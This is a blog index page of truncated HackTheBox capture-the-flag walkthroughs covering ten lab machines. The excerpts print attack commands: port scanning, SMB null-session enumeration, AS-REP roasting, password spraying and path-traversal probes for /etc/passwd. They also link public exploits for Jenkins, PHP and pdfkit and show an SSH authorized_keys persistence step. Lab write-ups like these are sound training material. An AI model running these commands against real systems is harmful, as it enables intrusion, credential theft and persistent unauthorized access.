HackTheBox: Editorial

Enumeration 1 export target=10.129.50.62 Port Scanning 1 rustscan -a $target --ulimit 10000 -g 1 nmap -Pn -sC -sV -n -p22,80 -T5 $target -oN nmap_editorial Add it to the /etc/hosts 1 echo '10.129.50.62 editorial.htb' | sudo tee -a /etc/hosts Web Application (80) There is a book upload page I’ve tried to upload a php file VHost fuzzing, no luck There is a cover URL we can provide, try SSRF: ...

August 17, 2026 · 3 min · 445 words · burkocyigit

HackTheBox: Monteverde

Enumeration 1 export target=10.129.50.93 Port Scanning 1 rustscan -a $target --ulimit 10000 -g 1 nmap -Pn -sC -sV -n -p53,88,135,139,389,464,636,445,5985,9389,49667,49674,49673,49676,49696 -T5 $target -oN nmap_monteverde SMB Try null session 1 nxc smb $target -u '' -p '' Get users 1 nxc smb $target -u '' -p '' --users Get shares 1 nxc smb $target -u '' -p '' --shares Try ASREP-Roasting 1 impacket-GetNPUsers MEGABANK.LOCAL/ -usersfile users.txt -no-pass -dc-ip $target -format hashcat -outputfile asrep_hashes.txt Password Spraying 1 nxc smb $target -u users.txt -p users.txt --continue-on-success One hit: ...

August 17, 2026 · 2 min · 235 words · burkocyigit

HackTheBox: Querier

Enumeration 1 export target=10.129.50.86 Port Scanning 1 rustscan -a $target --ulimit 10000 -g 1 nmap -Pn -sC -sV -n -p135,139,5985,445,47001,49664,49667,49665,49666 -T5 $target -oN nmap_querier SMB SMB is open. Try null session 1 smbclient -N -L //$target/ 1 smbclient -N //$target/Reports There is a file we can access, download it 1 mget * It is a .xlsm file. We need to find a way to open it. ...

August 17, 2026 · 2 min · 298 words · burkocyigit

HackTheBox: Sauna

Enumeration 1 export target=10.129.95.180 Port Scanning 1 2 3 rustscan -a $target --ulimit 10000 -g 10.129.95.180 -> [53,80,88,135,139,389,445,464,593,3268,3269,5985,9389,49667,49674,49673,49676,49688,49696] 1 nmap -Pn -n -sC -sV -p53,80,88,135,139,389,445,464,593,3268,3269,5985,9389,49667,49674,49673,49676,49688,49696 -T5 $target -oN nmap_sauna Web Application (80) We have potential usernames? We can try to find Kerberos Pre-Authentication disabled users Create a wordlist Using the /about.html page, create a names.txt file with the format ‘Firstname Lastname’ Then using names.txt, generate a wordlist using username-anarchy: ...

August 16, 2026 · 2 min · 241 words · burkocyigit

HackTheBox: Builder

Enumeration 1 export target=10.129.230.220 Port Scanning 1 rustscan -a $target --ulimit 10000 -g 1 nmap -Pn -sC -sV -n -p22,8080 -T5 $target Web Application (8080) Jenkins 2.441 There is a user, jennifer On Jenkins 2.441 there is a arbitrary file read vulnerability, CVE-2024-23897, and there is a public exploit for it: https://github.com/godylockz/CVE-2024-23897 We can get the var/jenkins_home/users/users.xml There is a user directory jennifer_12108429903186576833, let’s read its config file ...

August 14, 2026 · 1 min · 199 words · burkocyigit

HackTheBox: Forest

Enumeration 1 export target=10.129.48.132 Port Scanning 1 rustscan -a $target --ulimit 10000 -g 1 nmap -Pn -sC -sV -n -p53,135,139,445,593,636,3269,3268,5985,9389,464,389,47001,49666,49664,49665,49668,49671,49677,49676,49681,49698 -T5 $target -oN nmap_forest Domain Enumeration 1 enum4linux-ng -A $target We can enum users with nxc 1 nxc smb $target -u '' -p '' --users I’ve saved the usernames into users.txt Enumerate if any user can be AS-REP Roastable 1 impacket-GetNPUsers htb.local/ -usersfile users.txt -no-pass -dc-ip 10.129.48.132 -format hashcat ...

August 13, 2026 · 2 min · 312 words · burkocyigit

HackTheBox: Jeeves

Enumeration 1 export target=10.129.228.112 Port Scanning 1 rustscan -a $target --ulimit 10000 -g 1 nmap -Pn -sC -sV -n -p80,135,445,50000 -T5 $target Web Application (80) Just a search bar Typed ‘hey’ and press Search. Then got this weird error (because it is an image) We learn that database is Microsoft SQL Server 2005 - 9.00.4053.00 .NET version 2.0.50727.4223 dirsearch nothing showed up 1 2 3 4 5 6 7 # Dirsearch started Thu Aug 13 02:20:04 2026 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://10.129.228.112/ --exclude-sizes 0B 403 312B http://10.129.228.112/%2e%2e//google.com 403 312B http://10.129.228.112/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 403 312B http://10.129.228.112/\..\..\..\..\..\..\..\..\..\etc\passwd 403 312B http://10.129.228.112/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd 200 50B http://10.129.228.112/error.html Jetty (50000) ...

August 13, 2026 · 3 min · 552 words · burkocyigit

HackTheBox: Dog

Enumeration 1 export target=10.129.231.223 1 rustscan -a $target --ulimit 10000 -g 1 nmap -Pn -sC -sV -n -p22,80 -T5 $target Add dog.htb to hosts Nmap says there is are git repo found. Let’s download it. 1 wget -r -np -R "index.html*" http://$target Looking around, I find the mysql password of root 1 BackDropJ2024DS2024 Found another user in the repo: 1 tiffany Web Application (80) Blog, powered by Backdrop CMS ...

August 12, 2026 · 2 min · 255 words · burkocyigit

HackTheBox: Knife

Enumeration 1 export target=10.129.48.60 Port Scanning 1 rustscan -a $target --ulimit 10000 -g 1 nmap -Pn -sC -sV -n -p22,80 -T5 $target Initial Foothold PHP version is 8.1.0-dev It has a RCE exploit (www.exploit-db.com/exploits/49933) Persistence 1 ssh-keygen -t ed25519 -f persist -N '' 1 2 3 4 5 6 7 $ mkdir ~/.ssh $ chmod 700 ~/.ssh $ echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINxWXXtr3AsLHPThSrbfRuFUTfqCcghxiINCr9pz5rEg burak@kali" > ~/.ssh/authorized_keys $ chmod 600 ~/.ssh/authorized_keys ...

August 12, 2026 · 1 min · 134 words · burkocyigit

HackTheBox: Precious

Enumeration 1 export target=10.129.48.66 Port Scanning 1 rustscan -a $target --ulimit 10000 -g 1 nmap -Pn -sC -sV -n -p22,80 -T5 $target Add it to the etc/hosts Web Application Smells like SSRF or LFI, test it out. Setup a server: 1 python3 -m http.server 8000 Initial Foothold Server uses Ruby and pdfkit to convert to PDFs. pdfkit 0.8.6 has a command injection vulnerability and has a public exploit (https://github.com/UNICORDev/exploit-CVE-2022-25765) ...

August 12, 2026 · 3 min · 454 words · burkocyigit